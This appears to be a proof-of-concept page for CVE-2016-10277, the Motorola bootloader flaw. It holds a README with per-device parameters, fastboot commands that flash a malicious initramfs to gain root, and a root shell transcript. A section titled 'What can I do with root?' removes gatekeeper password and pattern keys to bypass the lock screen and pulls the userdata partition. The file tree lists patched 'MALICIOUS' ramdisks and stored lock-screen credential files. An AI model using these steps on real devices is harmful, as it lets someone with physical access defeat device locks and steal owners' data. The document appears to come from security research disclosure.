CVE-2016-10277 PoC — Android Motorola bootloader permission and access control vulnerability

Source
Associated Vulnerability
Title: Android Motorola bootloader permission and access control vulnerability (CVE-2016-10277)
Description: Android on Nexus 6 is an open-source, Linux-based operating system developed jointly by Google (USA) and the Open Handset Alliance (OHA) that runs on the Nexus 6 smartphone and similar devices. The Motorola bootloader is the loader from Motorola (USA) used on it. The Motorola bootloader in Android on Nexus 6 devices has a privilege escalation vulnerability. An attacker can exploit it via a local malicious application to execute arbitrary code in the context of the bootloader.
Description
Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass
Readme
# Exploiting CVE-2016-10277
More information at: https://alephsecurity.com/2017/06/07/initroot-moto/

If you only want to check whether your device is vulnerable,
it is quicker to flash the stock ramdisk (without any modifications).
In that case, look for ``initroot-*-STOCK*.cpio.gz``.

## Motorola XT-1033
- Scratch Address: 0x11000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1033-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1033-p64-MALICIOUS.cpio.gz

## Motorola XT-1040
- Scratch Address: 0x11000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1040-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1040-p64-MALICIOUS.cpio.gz

## Motorola XT-1068
- Scratch Address: 0x11000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1068-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1068-p64-MALICIOUS.cpio.gz

## Motorola XT-1069
- Scratch Address: 0x11000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1069-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1069-p64-MALICIOUS.cpio.gz

## Motorola XT-1078
- Scratch Address: 0x11000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1078-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1078-p64-MALICIOUS.cpio.gz

## Motorola XT-1514
- Scratch Address: 0x90000000
- Padding: 64MB
- Stock ROM padded ramdisk: initroot-xt1514-p64-STOCK.cpio.gz
- Stock ROM patched and padded ramdisk: initroot-xt1514-p64-MALICIOUS.cpio.gz



## Running and checking root access:
  - Flashing and solving bootloops:

        git clone https://github.com/leosol/initroot.git
        cd xt1040 (or the folder for your device)
        use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you get a bootloop)
        Or use the following commands:
        fastboot flash aleph $FILE_NAME
        fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
        fastboot continue
        #use the following to solve bootloops
        fastboot oem config fsg-id ""

  - Checking root privileges:   
  
        root@debian-vaio:~/motoramfs/xt1040# adb devices
        List of devices attached
        * daemon not running. starting it now on port 5037 *
        * daemon started successfully *
        T0092020C5	device

        root@debian-vaio:~/motoramfs/xt1040# adb shell
        root@peregrine:/ # getenforce
        >Permissive

  - What can I do with root?   

        #remove authentication as pointed out by @kraftdenker (tested on xt1068)
        mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
        mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key

        #dump your data
        adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata

        #or make it permanent


File Snapshot

    [4.0K] /data/pocs/9c52df978d98e27bfeaf8828ba4300d94050e99d
    ├── [4.0K] misc
    │   └── [4.0K] xt1040
    │       ├── [4.0K] gesture-L
    │       │   ├── [  20] gesture.key
    │       │   ├── [4.0K] locksettings.db
    │       │   ├── [ 32K] locksettings.db-shm
    │       │   ├── [193K] locksettings.db-wal
    │       │   └── [  72] password.key
    │       └── [4.0K] pin-123456
    │           ├── [  20] gesture.key
    │           ├── [4.0K] locksettings.db
    │           ├── [ 32K] locksettings.db-shm
    │           ├── [161K] locksettings.db-wal
    │           └── [  72] password.key
    ├── [2.7K] README.md
    ├── [4.0K] xt1033
    │   ├── [ 65M] initroot-xt1033-p64-MALICIOUS.cpio.gz
    │   ├── [ 65M] initroot-xt1033-p64-STOCK.cpio.gz
    │   ├── [ 195] run-malicious.sh
    │   ├── [ 190] run-stockramfs.sh
    │   └── [  81] solve-bootloop.sh
    ├── [4.0K] xt1040
    │   ├── [ 65M] initroot-xt1040-p64-MALICIOUS.cpio.gz
    │   ├── [ 65M] initroot-xt1040-p64-STOCK.cpio.gz
    │   ├── [ 195] run-malicious.sh
    │   ├── [ 191] run-stockramfs.sh
    │   └── [  81] solve-bootloop.sh
    ├── [4.0K] xt1068
    │   ├── [ 65M] initroot-xt1068-p64-MALICIOUS.cpio.gz
    │   ├── [ 65M] initroot-xt1068-p64-STOCK.cpio.gz
    │   ├── [ 195] run-malicious.sh
    │   ├── [ 190] run-stockramfs.sh
    │   └── [  81] solve-bootloop.sh
    ├── [4.0K] xt1069
    │   ├── [ 65M] initroot-xt1069-p64-MALICIOUS.cpio.gz
    │   ├── [ 65M] initroot-xt1069-p64-STOCK.cpio.gz
    │   ├── [ 195] run-malicious.sh
    │   ├── [ 190] run-stockramfs.sh
    │   └── [  81] solve-bootloop.sh
    ├── [4.0K] xt1078
    │   ├── [ 65M] initroot-xt1078-p64-MALICIOUS.cpio.gz
    │   ├── [ 65M] initroot-xt1078-p64-STOCK.cpio.gz
    │   ├── [ 195] run-malicious.sh
    │   ├── [ 190] run-stockramfs.sh
    │   └── [  81] solve-bootloop.sh
    └── [4.0K] xt1514
        ├── [ 65M] initroot-xt1514-p64-STOCK.cpio.gz
        ├── [ 547] run-malicious.sh
        ├── [ 190] run-stockramfs.sh
        └── [  81] solve-bootloop.sh

    10 directories, 40 files